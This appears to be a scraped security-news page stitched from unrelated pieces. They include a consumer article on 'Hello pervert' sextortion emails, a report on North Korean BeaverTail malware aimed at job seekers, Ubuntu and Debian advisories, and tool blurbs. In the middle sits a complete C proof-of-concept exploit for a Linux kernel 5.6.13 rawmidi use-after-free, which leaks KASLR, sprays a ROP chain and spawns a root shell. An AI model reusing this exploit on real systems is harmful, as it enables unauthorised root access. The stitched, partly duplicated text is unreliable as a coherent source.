" Hello pervert"  sextortion mails keep adding new features to their email to increase credibility and urge victims to pay

After using passwords obtained from one of the countless breaches as a lure to trick victims into paying, the “Hello pervert” sextortion scammers have recently introduced two new pressure tactics: Name-dropping the infamous Pegasus spyware and adding pictures of your home environment.

They do this to add credibility to the false claims that the scammers have been watching your online behavior and caught you red-handed during activities that you would like to keep private amongst your friends and family.

The email usually starts with “Hello pervert” and then goes on to claim that the target has been watching pornographic content. The scammers often claim to have footage of what you were watching and what you were doing while watching.

To stop the sender from spreading the incriminating footage, the target will have to pay the scammer, or else they will send it to everyone in their email contacts list.

More recently, scammers have started increasing their threats by mentioning a powerful spyware called “Pegasus.” Several versions of these scam emails have included the following text:

> Have you heard of Pegasus? This is a spyware program that installs on computers and smartphones and allows hackers to monitor the activity of device owners. It provides access to your webcam, messengers, emails, call records, etc. It works well on Android, iOS, and Windows.

Though Pegasus is indeed a powerfully invasive spyware tool, the threat of its use, as included in these scam emails, is entirely empty. This is because Pegasus has never been observed outside of a surveillance campaign carried out, specifically, by governments. Time and time again, Pegasus has been used by oppressive government regimes to spy on political dissidents, human rights activists, and watchdog journalists. There is essentially no proof that such a closely-guarded spyware has ended up in the hands of everyday scammers.

But the pressure tactics don’t end with Pegasus, as many of these emails include an old (or active) password that a scam target has used in the past. Here, this isn’t some act of advanced hacking. Instead, it is likely that the scammers bought your password from other cybercriminals that obtained them during one of the countless data breaches that hit company after company every week.

When scammers have access to such data, it may also include your physical address. With that knowledge, scammers have increased their threats by simply adding a photograph of your personal neighborhood by looking it up online. For most places in inhabited areas, you can grab such pictures from Google Maps or similar apps.

A Reddit user demonstrated this by finding that such a scammer used an old PO box address. But it’s true that this adds a convincing argument to the claim that the sender has been spying on you.  

As an extra threat the email may include something like:

> “Or is visiting \[your physical address\] a more convenient way to contact if you don’t take action. Nice location btw.”

Implying that they know where you live and threatening to stop by and create a scene.

**How to recognize “Hello pervert” emails**

Once you know what’s going on it’s easy to recognize these emails. Remember that not all of the below characteristics have to be included in these emails, but all of them are red flags in their own right.

*   They often look as if they came from one of your own email addresses.
*   The scammer accuses you of inappropriate behavior and claims to have footage of that behavior.
*   In the email the scammer claims to have used Pegasus or some Trojan to spy on you through your own computer.
*   The scammer says they know “your password.”
*   You are urged to pay up quickly or the so-called footage will be spread to all your contacts. Often you’re only allowed one day to pay.
*   The actual message often arrives as an image or a pdf attachment. Scammers do this to bypass phishing filters.

**How to react to “Hello pervert” emails**

First and foremost, never reply to emails of this kind. It may tell the sender that someone is reading the emails sent to that address and they will repeatedly try new and other methods to defraud you.

*   If the email included a password, make sure you are not using it any more and if you are, change it as soon as possible.
*   If you are having trouble organizing your password, have a look at a password manager.
*   Don’t let yourself get rushed into action or decisions. Scammers rely on the fact that you will not take the time to think this through and subsequently make mistakes.
*   Do not open unsolicited attachments. Especially when the sender address is suspicious or even your own.
*   For your ease of mind, turn of your webcam or buy a webcam cover so you can cover it when you’re not using the webcam.

If you want to find out what personal data of yours has been exposed online, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 “Hello pervert” sextortion scam includes new threat of Pegasus—and a picture of your home 

Proof of concept exploit that uses a use-after-free vulnerability due to a race condition in MIDI devices in Linux Kernel version 5.6.13.

// gcc -o exploit exploit.c -masm=intel -static -s -lpthread  
#define _GNU_SOURCE  
#include <stdio.h>  
#include <stdlib.h>  
#include <stdbool.h>  
#include <sys/types.h>  
#include <sys/stat.h>  
#include <fcntl.h>  
#include <sys/ioctl.h>  
#include <errno.h>  
#include <string.h>  
#include <unistd.h>  
#include <stdint.h>  
#include <sound/asound.h>  
#include <sys/mman.h>  
#include <sys/syscall.h>  
#include <linux/userfaultfd.h>  
#include <sys/timerfd.h>  
#include <sys/ipc.h>  
#include <sys/msg.h>  
#include <pthread.h>  
#include <poll.h>

#define errExit(msg)    do { perror(msg); exit(EXIT_FAILURE); \  
                        } while (0)

                        #define ADDRESS_PAGE_FAULT1 0x1337000  
#define ADDRESS_PAGE_FAULT2 0x3331000  
#define ADDRESS_PAGE_FAULT3 0x5551000  
#define PAGE_SIZE 0x1000  
#define DRIVER_RAWMIDI "/dev/snd/midiC0D0"

#define SNDRV_RAWMIDI_STREAM_OUTPUT 0

uint32_t uffd;  
uint32_t fd1, fd2, fd3;  
uint64_t next;  
uint64_t fake_table;

pthread_t thread[6];

bool release_page_fault = false;

static void *page;

unsigned long pivot;  
unsigned long kernel_base;  
unsigned long timerfd_tmrproc;

unsigned long usr_cs, usr_ss, usr_rflags, usr_sp;

struct args_trigger  
{  
    char *addr;  
    int size;  
    uint32_t fd;  
};

void hexdump(uint64_t *buf, uint64_t size)  
{  
    for (int i = 0; i < size / 8; i += 2)  
    {  
        printf("0x%x ", i * 8);  
        printf("%016lx %016lx\n", buf[i], buf[i + 1]);  
    }  
}

static void save_state()  
{  
    __asm__ __volatile__(  
    "movq %0, cs;"  
    "movq %1, ss;"  
    "pushfq;"  
    "popq %2;"  
    "movq %3, %%rsp\n"  
    : "=r" (usr_cs), "=r" (usr_ss), "=r" (usr_rflags), "=r" (usr_sp) : : "memory" );  
}

static void getRootShell()  
{  
    if(getuid())  
    {  
        printf("[-] Failed to get a root");  
        exit(0);  
    }

    printf("[+] uid : %d\n", getuid());  
    printf("[+] Got root.\n");

    execl("/bin/sh", "sh", NULL);  
}

void register_userfaultfd(uint64_t *range)  
{  
    struct uffdio_api uffdio_api;  
    struct uffdio_register uffdio_register;

    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);

    if (uffd == -1)  
    {  
        perror("[-] userfaultfd");  
        exit(0);  
    }

    uffdio_api.api = UFFD_API;  
    uffdio_api.features = 0;

    if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)  
    {  
        perror("[-] ioctl");  
        exit(0);  
    }

    printf("[*] Start monitoring range: %p - %p\n", page, page + PAGE_SIZE);

    uffdio_register.range.start = (uint64_t) range;  
    uffdio_register.range.len = PAGE_SIZE;  
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;

    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)  
    {  
        perror("[-] ioctl");  
        exit(0);  
    }

    puts("[+] Userfaultfd registered");  
}

void *handler_userfaultfd(void *args)  
{  
    uint64_t uffd = *(uint64_t *)args;

    struct uffd_msg msg;  
    struct uffdio_copy uffdio_copy;  
    uint64_t nread;  
    void *page2 = NULL;

    if ((page2 = mmap((void *)0xdead000, PAGE_SIZE * 5, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)  
    {  
        perror("[-] mmap()");  
        exit(0);  
    }

    uint64_t m_ts = 0x000000000000ffff;  
    memcpy(page2, (char *) &m_ts, 8);

    while (true)  
    {  
        struct pollfd pollfd;  
        int nready;

        pollfd.fd = uffd;  
        pollfd.events = POLLIN;

                nready = poll(&pollfd, 1, -1);

        if (nready == -1)  
        {  
            perror("[-] poll");  
            exit(0);  
        }

        nread = read(uffd, &msg, sizeof(msg));

                if (nread == 0)  
        {  
            perror("[-] EOF on userfaultfd!\n");  
            exit(0);  
        }

        if (nread == -1)  
        {  
            perror("[-] read");  
            exit(0);  
        }

        char *page_fault_location = (char *)msg.arg.pagefault.address;

        if (msg.event != UFFD_EVENT_PAGEFAULT)  
        {  
            perror("[-] Unexpected event on userfaultfd");  
            exit(0);  
        }

        if (msg.arg.pagefault.address == (void *)0x1337000 || msg.arg.pagefault.address == (void *)0x3331000 || msg.arg.pagefault.address == (void *)0x5551000)  
        {  
            printf("[+] Page Fault triggered on address 0x%llx\n", msg.arg.pagefault.address);

            if(msg.arg.pagefault.address == (void *)0x5551000)  
            {  
                memcpy(page2, (char *) &fake_table, 8);  
            }

            while (release_page_fault == false);

            uffdio_copy.src = (uint64_t) page2;  
            uffdio_copy.dst = (uint64_t) msg.arg.pagefault.address &~(PAGE_SIZE - 1);  
            uffdio_copy.len = PAGE_SIZE;  
            uffdio_copy.mode = 0;  
            uffdio_copy.copy = 0;

            if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)  
            {  
                perror("[-] ioctl");  
                exit(0);  
            }

            release_page_fault = false;  
        }  
    }

    close(uffd);  
    puts("[+] Page fault thread finished");  
}

void *trigger_userfaultfd(struct args_trigger *args)  
{  
    char *addr = (char *) args->addr;  
    int size = args->size;  
    uint32_t fd = (uint64_t) args->fd;

    write(fd, addr, size);  
}

void send_msg(int qid, const void *msg_buf, size_t size, long mtype)  
{  
    struct msgbuf  
    {  
        long mtype;  
        char mtext[size - 0x30];  
    } msg;

    msg.mtype = mtype;  
    memcpy(msg.mtext, msg_buf, sizeof(msg.mtext));

    if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)  
    {  
        perror("msgsnd");  
        exit(1);  
    }  
}

void *recv_msg(int qid, size_t size)  
{  
    void *memdump = malloc(size);

    if (msgrcv(qid, memdump, size, 0, IPC_NOWAIT | MSG_NOERROR) == -1)  
    {  
        perror("msgrcv");  
        return NULL;  
    }

    return memdump;  
}

void build_rop(char *buf)  
{  
    uint64_t *rop = (uint64_t *)&buf[0x0];  
    int k = 0;

    /* commit_creds(prepare_kernel_cred(0)) */  
    rop[k++] = kernel_base + 0x15e8; // pop rdi ; ret  
    rop[k++] = 0x0;  
    rop[k++] = kernel_base + 0x8a800; // prepare_kernel_cred  
    rop[k++] = kernel_base + 0x49fb8; // pop rdx ; ret  
    rop[k++] = 0x8;  
    rop[k++] = kernel_base + 0xa6b081; // cmp rdx, 8 ; jne 0xffffffff81a6b05e ; ret  
    rop[k++] = kernel_base + 0x3dfdb4; // mov rdi, rax ; jne 0xffffffff813dfda1 ; xor eax, eax ; ret  
    rop[k++] = kernel_base + 0x8a3c0; // commit_creds

    /* kpti trampoline */  
    rop[k++] = kernel_base + 0xc00a45; // swapgs_restore_regs_and_return_to_usermode + 22  
    rop[k++] = 0x0; // rax  
    rop[k++] = 0x0; // rdi

        rop[k++] = (unsigned long)&getRootShell;  
    rop[k++] = (unsigned long)usr_cs;  
    rop[k++] = (unsigned long)usr_rflags;  
    rop[k++] = (unsigned long)usr_sp;  
    rop[k++] = (unsigned long)usr_ss;

    uint64_t *func_table = (uint64_t *)&buf[0x100];  
    for (size_t i = 0; i < 12; i++)  
    {  
        if (i == 4)  
        {  
            *func_table++ = kernel_base + 0x1e; // ret;  
            continue;  
        }

        if (i == 5)  
        {  
            *func_table++ = kernel_base + 0x1e; // ret  
            continue;  
        }

        if (i == 6)  
        {  
            *func_table++ = kernel_base + 0x1e; // ret  
            continue;  
        }

        *func_table++ = 0xdeadbeefdeadbe00 + i;  
    }

    *func_table = pivot;  
}

void pin_cpu(long cpu_id)  
{  
    cpu_set_t mask;

    CPU_ZERO(&mask);  
    CPU_SET(cpu_id, &mask);

    if (sched_setaffinity(0, sizeof(mask), &mask) == -1)  
    {  
        err("`sched_setaffinity()` failed: %s", strerror(errno));  
    }

    return;  
}

void main(void)  
{  
    pin_cpu(0);

    struct snd_rawmidi_params srp;

    save_state();

    /* ===================== [ SETP 1 - KASLR Leak ] ===================== */

    puts("[+] STEP 1 : KASLR leak");  
    fd1 = open(DRIVER_RAWMIDI, O_RDWR);

    if (fd1 < 0)  
    {  
        perror("[-] open");  
        exit(0);  
    }

    puts("[+] Opening rawmidi");

    int qid[2];  
    if ((qid[0] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)  
    {  
        perror("msgget");  
        exit(1);  
    }

    struct itimerspec its;

    its.it_interval.tv_sec = 0;  
    its.it_interval.tv_nsec = 0;  
    its.it_value.tv_sec = 9999;  
    its.it_value.tv_nsec = 0;

    int tfd[256];

    for(int i = 0; i < 256 / 2; i++)  
    {  
        tfd[i] = timerfd_create(CLOCK_REALTIME, 0);  
        timerfd_settime(tfd[i], 0, &its, 0);  
    }

    if ((page = mmap((void *)0x1336000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)  
    {  
        perror("[-] mmap()");  
        exit(0);  
    }

    puts("[+] Mapping two pages");

    char *addr = page;  
    memset(addr, 'A', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */  
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT1);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */  
    pthread_create(&thread[0], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 256 */  
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;  
    srp.buffer_size = 240;  
    srp.avail_min = 1;  
    uint64_t err = ioctl(fd1, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Created one object by size 256");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    struct args_trigger args;  
    args.addr = addr + PAGE_SIZE - 0x18;  
    args.size = 0x18 + 0x8;  
    args.fd= fd1;

    /* Blocking before object created by size 256 in userfault */  
    pthread_create(&thread[1], NULL, (void *) trigger_userfaultfd, &args);  
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 256 generating an UAF */  
    srp.buffer_size = 250;  
    err = ioctl(fd1, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Deleting before object created by size 256 generating UAF");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    /* send_msg 'A' */  
    char buf[0xf8 - 0x30];  
    memset(buf, 0x41, sizeof(buf));  
    send_msg(qid[0], buf, 0xf8, 1);

    puts("[+] Allocate msg_msg in kmalloc-256");

    printf("[*] Waiting for userfaultd to finish ..\n");  
    release_page_fault = true;

    /* spray timerfd_ctx in kmalloc-256 */  
    for(int i = 256 / 2; i < 256; i++)  
    {  
        tfd[i] = timerfd_create(CLOCK_REALTIME, 0);  
        timerfd_settime(tfd[i], 0, &its, 0);  
    }

    puts("[+] Allocate timerfd_ctx in kmalloc-256");

    while(release_page_fault == true);  
    printf("[+] Page fault lock released\n");

    uint64_t *leak = recv_msg(qid[0], 0x2000);

    // hexdump(leak, 0x2000);

    timerfd_tmrproc =  *(leak + (0x200 / sizeof(uint64_t)));  
    kernel_base = timerfd_tmrproc - 0x2201f0;  
    pivot = kernel_base + 0x8fc625; // push r8 ; add byte ptr [rbp + 0x41], bl ; pop rsp ; pop r13 ; ret

    printf("[+] timerfd_tmrproc addr : 0x%lx\n", timerfd_tmrproc);  
    printf("[+] kernel_base addr : 0x%lx\n", kernel_base);  
    printf("[+] pivot addr : 0x%lx\n", pivot);

    for(int i = 0; i < 256; i++)  
    {  
        close(tfd[i]);  
    }

    close(fd1);  
    puts("[+] Close rawmidi");

    /* ===================== [ SETP 2 - SMAP Bypass ] ===================== */

    puts("\n[+] STEP 2 : SMAP bypass");

        release_page_fault = false;

    fd2 = open(DRIVER_RAWMIDI, O_RDWR);

    if (fd2 < 0)  
    {  
        perror("[-] open");  
        exit(0);  
    }

    puts("[+] Opening rawmidi");

    if ((qid[1] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)  
    {  
        perror("msgget");  
        exit(1);  
    }

    if ((page = mmap((void *)0x3330000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)  
    {  
        perror("[-] mmap()");  
        exit(0);  
    }

    puts("[+] Mapping two pages");

    addr = page;  
    memset(addr, 'B', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */  
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT2);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */  
    pthread_create(&thread[2], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 512 */  
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;  
    srp.buffer_size = 500;  
    srp.avail_min = 1;  
    err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Created one object by size 512");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }  
    args.addr = addr + PAGE_SIZE - 0x18;  
    args.size = 0x18 + 0x8;  
    args.fd= fd2;

    /* Blocking before object created by size 512 in userfault */  
    pthread_create(&thread[3], NULL, (void *) trigger_userfaultfd, &args);  
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 512 generating an UAF */  
    srp.buffer_size = 90;  
    err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Deleting before object created by size 512 generating UAF");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    /* rop spray in kmalloc-512 */  
    char secondary_buf[0x1ea - 0x30];  
    memset(secondary_buf, 0, sizeof(secondary_buf));  
    build_rop(secondary_buf);

    printf("[*] Waiting for userfaultd to finish ..\n");  
    release_page_fault = true;

    for(int i = 0; i < 0x20; i++)  
    {  
        send_msg(qid[1], secondary_buf, 0x1ea, 0x1337);  
    }

    puts("[+] Spray ROP Chain in kmalloc-512");

    while(release_page_fault == true);  
    printf("[+] Page fault lock released\n");

    uint64_t *leak2 = recv_msg(qid[1], 0x2000);  
    next = *(leak2 + (0x1d8 / sizeof(uint64_t))) + 0x30;  
    fake_table = next + 0x100;

    printf("[+] msg_msg->m_list.next leak : 0x%lx\n", next - 0x30);  
    printf("[+] Fake tty_struct->ops function table: 0x%lx\n", fake_table);

    // hexdump(leak2, 0x2000);

    close(fd2);  
    puts("[+] Close rawmidi");

    /* ===================== [ SETP 3 - tty_struct->ops overwrite ] ===================== */

    puts("\n[+] STEP 3 : Fake tty_struct->ops overwrite");

    release_page_fault = false;

    fd3 = open(DRIVER_RAWMIDI, O_RDWR);

    if (fd3 < 0)  
    {  
        perror("[-] open");  
        exit(0);  
    }

    puts("[+] Re-opening rawmidi");

    if ((page = mmap((void *)0x5550000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)  
    {  
        perror("[-] mmap()");  
        exit(0);  
    }

    puts("[+] Mapping two pages");

    addr = page;  
    memset(addr, 'C', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */  
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT3);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */  
    pthread_create(&thread[4], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 800 */  
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;  
    srp.buffer_size = 800;  
    srp.avail_min = 1;  
    err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Created one object by kmalloc-1024");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    args.addr = addr + PAGE_SIZE - 0x18;  
    args.size = 0x18 + 0x8;  
    args.fd= fd3;

    /* Blocking before object created by size 1024 in userfault */  
    pthread_create(&thread[5], NULL, (void *) trigger_userfaultfd, &args);  
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 1024 generating an UAF */  
    srp.buffer_size = 90;  
    err = ioctl(fd3, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Deleting before object created by size 1024 generating UAF");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    int spray[256];

    /* tty_struct spray */  
    for(int i = 0; i < 256; i++)  
    {  
        spray[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY);

        if(spray[i] < 0)  
        {  
            printf("[-] Failed open /dev/ptmx\n");  
        }  
    }

    puts("[+] Allocate tty_struct in kmalloc-1024");

    release_page_fault = true;

    while(release_page_fault == true);  
    puts("[+] Page fault lock released");

    for(int i = 0; i < 256; i++)  
    {  
        ioctl(spray[i], 0, next - 8);  
    }  
}

Linux Kernel 5.6.13 Use-After-Free

This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which the researcher independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models.

Mali GPU Kernel Local Privilege Escalation

North Korean threat actors have leveraged a fake Windows video conferencing application impersonating FreeConference.com to backdoor developer systems as part of an ongoing financially-driven campaign dubbed Contagious Interview.
The new attack wave, spotted by Singaporean company Group-IB in mid-August 2024, is yet another indication that the activity is also leveraging native installers for

North Korean threat actors have leveraged a fake Windows video conferencing application impersonating FreeConference.com to backdoor developer systems as part of an ongoing financially-driven campaign dubbed Contagious Interview.

The new attack wave, spotted by Singaporean company Group-IB in mid-August 2024, is yet another indication that the activity is also leveraging native installers for Windows and Apple macOS to deliver malware.

Contagious Interview, also tracked as DEV#POPPER, is a malicious campaign orchestrated by a North Korean threat actor tracked by CrowdStrike under the moniker Famous Chollima.

The attack chains begin with a fictitious job interview, tricking job seekers into downloading and running a Node.js project that contains the BeaverTail downloader malware, which in turn delivers a cross-platform Python backdoor known as InvisibleFerret, which is equipped with remote control, keylogging, and browser stealing capabilities.

Some iterations of BeaverTail, which also functions as an information stealer, have manifested in the form of JavaScript malware, typically distributed via bogus npm packages as part of a purported technical assessment during the interview process.

But that changed in July 2024 when the Windows MSI installer and Apple macOS disk image (DMG) files masquerading as the legitimate MiroTalk video conferencing software were discovered in the wild, acting as a conduit to deploy an updated version of BeaverTail.

The latest findings from Group-IB, which has attributed the campaign to the infamous Lazarus Group, suggest that the threat actor is continuing to lean on this specific distribution mechanism, the only difference being that the installer ("FCCCall.msi") mimics FreeConference.com instead of MiroTalk.

It's believed that the phony installer is downloaded from a website named freeconference\[.\]io, which uses the same registrar as the fictitious mirotalk\[.\]net website.

"In addition to Linkedin, Lazarus is also actively searching for potential victims on other job search platforms such as WWR, Moonlight, Upwork, and others," security researcher Sharmine Low said.

"After making initial contact, they would often attempt to move the conversation onto Telegram, where they would then ask the potential interviewees to download a video conferencing application, or a Node.js project, to perform a technical task as part of the interview process."

In a sign that the campaign is undergoing active refinement, the threat actors have been observed injecting the malicious JavaScript into both cryptocurrency- and gaming-related repositories. The JavaScript code, for its part, is designed to retrieve the BeaverTail Javascript code from the domain ipcheck\[.\]cloud or regioncheck\[.\]net.

It's worth mentioning here that this behavior was also recently highlighted by software supply chain security firm Phylum in connection with an npm package named helmet-validate, suggesting that the threat actors are simultaneously making use of different propagation vectors.

Another notable change is that BeaverTail is now configured to extract data from more cryptocurrency wallet extensions such as Kaikas, Rabby, Argent X, and Exodus Web3, in addition to implementing functionality to establish persistence using AnyDesk.

That's not all. BeaverTail's information-stealing features are now realized through a set of Python scripts, collectively called CivetQ, which is capable of harvesting cookies, web browser data, keystrokes, and clipboard content, and delivering more scripts. A total of 74 browser extensions are targeted by the malware.

"The malware is able to steal data from Microsoft Sticky Notes by targeting the application's SQLite database files located at \`%LocalAppData%\\Packages\\Microsoft.MicrosoftStickyNotes\_8wekyb3d8bbwe\\LocalState\\plum.sqlite,\` where user notes are stored in an unencrypted format," Low said.

"By querying and extracting data from this database, the malware can retrieve and exfiltrate sensitive information from the victim's Sticky Notes application."

The emergence of CivetQ points to a modularized approach, while also underscoring that the tools are under active development and have been constantly evolving in little increments over the past few months.

"Lazarus has updated their tactics, upgraded their tools, and found better ways to conceal their activities," Low said. "They show no signs of easing their efforts, with their campaign targeting job seekers extending into 2024 and to the present day. Their attacks have become increasingly creative, and they are now expanding their reach across more platforms."

The disclosure comes as the U.S. Federal Bureau of Investigation (FBI) warned of North Korean cyber actors' aggressive targeting of the cryptocurrency industry using "well-disguised" social engineering attacks to facilitate cryptocurrency theft.

"North Korean social engineering schemes are complex and elaborate, often compromising victims with sophisticated technical acumen," the FBI said in an advisory released Tuesday, stating the threat actors scout prospective victims by reviewing their social media activity on professional networking or employment-related platforms.

"Teams of North Korean malicious cyber actors identify specific DeFi or cryptocurrency-related businesses to target and attempt to socially engineer dozens of these companies' employees to gain unauthorized access to the company's network."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Targets Job Seekers with Fake FreeConference App

Zeek is a powerful network analysis framework that is much different from the typical IDS you may know. While focusing on network security monitoring, Zeek provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Zeek has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyber-infrastructure. Zeek's user community includes major universities, research labs, supercomputing centers, and open-science communities. This is the source code release.

Zeek 6.0.6

Ubuntu Security Notice 6985-1 - It was discovered that ImageMagick incorrectly handled certain malformed image files. If a user or automated system using ImageMagick were tricked into opening a specially crafted image, an attacker could exploit this to cause a denial of service or execute code with the privileges of the user invoking the program.

    ==========================================================================Ubuntu Security Notice USN-6985-1September 04, 2024imagemagick vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 14.04 LTSSummary:Several security issues were fixed in ImageMagick.Software Description:- imagemagick: Image manipulation programs and libraryDetails:It was discovered that ImageMagick incorrectly handled certain malformedimage files. If a user or automated system using ImageMagick were trickedinto opening a specially crafted image, an attacker could exploit this tocause a denial of service or execute code with the privileges of the userinvoking the program.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 14.04 LTS   imagemagick                     8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu Pro   imagemagick-common              8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu Pro   libmagick++-dev                 8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu Pro   libmagick++5                    8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu Pro   libmagickcore-dev               8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu Pro   libmagickcore5                  8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu Pro   libmagickcore5-extra            8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu Pro   libmagickwand-dev               8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu Pro   libmagickwand5                  8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu Pro   perlmagick                      8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:https://ubuntu.com/security/notices/USN-6985-1 <https://ubuntu.com/security/notices/USN-6985-1>   CVE-2019-10131, CVE-2019-10650, CVE-2019-11470, CVE-2019-11472,   CVE-2019-11597, CVE-2019-11598, CVE-2019-12974, CVE-2019-12975,   CVE-2019-12976, CVE-2019-12978, CVE-2019-12979

Ubuntu Security Notice USN-6985-1

Debian Linux Security Advisory 5765-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5765-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffSeptember 04, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2024-8381 CVE-2024-8382 CVE-2024-8383 CVE-2024-8384Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode.For the stable distribution (bookworm), these problems have been fixed inversion 115.15.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmbX9bEACgkQEMKTtsN8Tjbwzg/7BRH1FshkIoqMreCmhj9AYevh3VmSLDqcUOVU0a2LrLOqcJCsRIyhhrl5BXxGt0w9Q1KOIYBlwSsRU+EAlcwlh6+1FyKqrAcc8SDN+klK7NekODMHXj4gzge3adyaVYoYpHNhfYt+aVwZD+XTrI0d64V9HsO7Jsa9bwyI+xelgxuFfb8061L4q+ViQgzyCrl+vjaS6doRK5gZCVjPeuaFPKbppO5VIapF2/RIqDqZOCrziSONeqTaw7IRPITMnEHEl/+hPK9qQOmyw/suEES/Cl7aagj5znd8pQVvwpMMql/soAGX96G+y/2dC0s4cgaxwN6JAyRao7tFbCTjHpbxK+hy6pXcEBnrMPZ79plaZQ7L5uEMX6OxgEtRWGRA10Nti1RxRT48bgx8o8BnQ7K7lIHJn8afXb5pTf9rwezRyvy0UrCHAtta6Z2galVPrb5tbPBLt8MrS0cPd+RYj1M8wgrVnxCIa8N4qHLtw0adiyZa32e+lwtCbOhMQarAobD3zFGKBJsd0/lzKjeQHgIX3hRmZ57TOAgqRR6M91bbtxpDg+dGrxMUiqV/+fF7oB3WsR4KgXJCO+1YR7khOlWieTl+2Uf/w3PT0BBE4smJ9SAa+ZZuGZFyVVdmWRP2hy3OR5h7Hpe3po59/TzMlIcm6TdhYKUp0q/ANPKFS0cu9Ks==YiPV-----END PGP SIGNATURE-----

Debian Security Advisory 5765-1

OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer and Transport Layer Security protocols with full-strength cryptography world-wide.

Latest News